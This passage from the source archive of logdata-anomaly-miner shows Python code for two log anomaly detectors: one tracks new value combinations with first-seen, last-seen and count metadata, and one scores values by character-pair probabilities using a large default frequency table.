""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EnhancedNewMatchPathValueComboDetector.py000066400000000000000000000323111500476301700407410ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file defines the EnhancedNewMatchPathValueComboDetector. detector to extract values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import types from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.util import PersistenceUtil from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME, \ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class EnhancedNewMatchPathValueComboDetector(NewMatchPathValueComboDetector): """This class creates events when a new value combination for a given list of match data paths were found. 
It is similar to the NewMatchPathValueComboDetector basic detector but also provides support for storing meta information about each. detected value combination, e.g. * the first time a tuple was detected using the LogAtom default timestamp. * the last time a tuple was seen * the number of times the tuple was seen * user data for annotation. Due to the additional features, this detector is slower than the basic detector. """ def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, tuple_transformation_function=None, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param tuple_transformation_function when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None self.known_values_dict = {} if tuple_transformation_function is not None and not isinstance(tuple_transformation_function, types.FunctionType): msg = "tuple_transformation_function must be a function." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.tuple_transformation_function = tuple_transformation_function super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_string = "%Y-%m-%d %H:%M:%S" self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Dictionary and tuples were stored as list of lists. Transform # the first lists to tuples to allow hash operation needed by set. for value_tuple, extra_data in persistence_data: self.known_values_dict[tuple(value_tuple)] = extra_data logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. 
""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False timestamp = log_atom.get_timestamp() timestamp = round(timestamp, 3) match_value_list = [] for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match_element in matches: match_value_list.append(match_element.match_object) if self.tuple_transformation_function is not None: match_value_list = self.tuple_transformation_function(match_value_list) match_value_tuple = tuple(match_value_list) if self.known_values_dict.get(match_value_tuple) is None: self.known_values_dict[match_value_tuple] = [timestamp, timestamp, 1] self.log_new_learned_values.append(match_value_tuple) else: extra_data = self.known_values_dict.get(match_value_tuple) extra_data[1] = timestamp extra_data[2] += 1 affected_log_atom_values = [] metadata = {} for match_value in list(match_value_tuple): if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) values = self.known_values_dict.get(match_value_tuple) metadata["TimeFirstOccurrence"] = values[0] 
metadata["TimeLastOccurrence"] = values[1] metadata["NumberOfOccurrences"] = values[2] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_log_atom_values, "Metadata": metadata} event_data = {"AnalysisComponent": analysis_component} if (self.learn_mode and self.known_values_dict.get(match_value_tuple)[2] == 1) or not self.learn_mode: self.log_learned_path_value_combos += 1 try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(self.known_values_dict) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(self.known_values_dict)] for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines, event_data, log_atom, self) if self.learn_mode and self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [] for dict_record in self.known_values_dict.items(): persistence_data.append(dict_record) PersistenceUtil.store_json(self.persistence_file_name, persistence_data) 
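def allowlist_event(self, event_type, event_data, allowlisting_data):
    """Allowlist an event generated by this source using the information emitted when generating the event.
    @param event_type must be "Analysis.<this class name>", i.e. the type this detector used when emitting the event.
    @param event_data a tuple (timestamp, values) where values is a tuple or list with exactly one entry per path in
    target_path_list. The values are stored as a tuple so they match the keys written by receive_atom.
    @param allowlisting_data must be None, this detector does not understand additional allowlisting data.
    @return a message with information about allowlisting
    @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
    @throws TypeError when event_data does not have the expected shape or contains None while
    allow_missing_values_flag is False.
    """
    if event_type != f"Analysis.{self.__class__.__name__}":
        msg = "Event not from this source"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if allowlisting_data is not None:
        msg = "Allowlisting data not understood by this detector"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if not isinstance(event_data, tuple) or len(event_data) != 2 or not isinstance(event_data[0], (float, int)) or \
            not isinstance(event_data[1], (tuple, list)) or len(event_data[1]) != len(self.target_path_list):
        msg = "event_data has to be of type tuple and must contain timestamp and tuple of values."
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise TypeError(msg)
    # A list is not hashable and could not be used as dictionary key; normalize to the tuple form receive_atom uses.
    value_tuple = tuple(event_data[1])
    # Check the value tuple itself for missing values, not the outer (timestamp, values) pair.
    if not self.allow_missing_values_flag and None in value_tuple:
        msg = "event_data must not have None values if allow_missing_values_flag is False."
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise TypeError(msg)
    current_timestamp = event_data[0]
    # [first seen, last seen, occurrence count] is the record layout maintained by receive_atom.
    self.known_values_dict[value_tuple] = [current_timestamp, current_timestamp, 1]
    return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}."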
""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] EntropyDetector.py000066400000000000000000001422661500476301700344660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for character pair probabilities in values. The idea is based on freq.py (https://github.com/markbaggett/freq) by Mark Baggett. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EntropyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when character pairs with low probabilities occur in values.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, prob_thresh=0.05, default_freqs=False, skip_repetitions=False, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same path. @param prob_thresh limit for the average probability of character pairs for which anomalies are reported. @param default_freqs initializes the probabilities with default values from https://github.com/markbaggett/freq. @param skip_repetitions boolean that determines whether only distinct values are used for character pair counting. 
This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run. @param persistence_id name of persistence file. @param learn_mode when set to True, the detector will extend the table of character pair frequencies based on new values. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, prob_thresh=prob_thresh, default_freqs=default_freqs, skip_repetitions=skip_repetitions, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.value_set = set() self.freq = {} self.total_freq = {} if default_freqs is True: # Default probabilities taken from https://github.com/markbaggett/freq default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 
23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], ["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], 
["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], ["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 
6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], ["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 
62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], ["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], 
["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], ["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 4], ["y", 88], ["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], 
["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], ["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], ["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], 
["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], 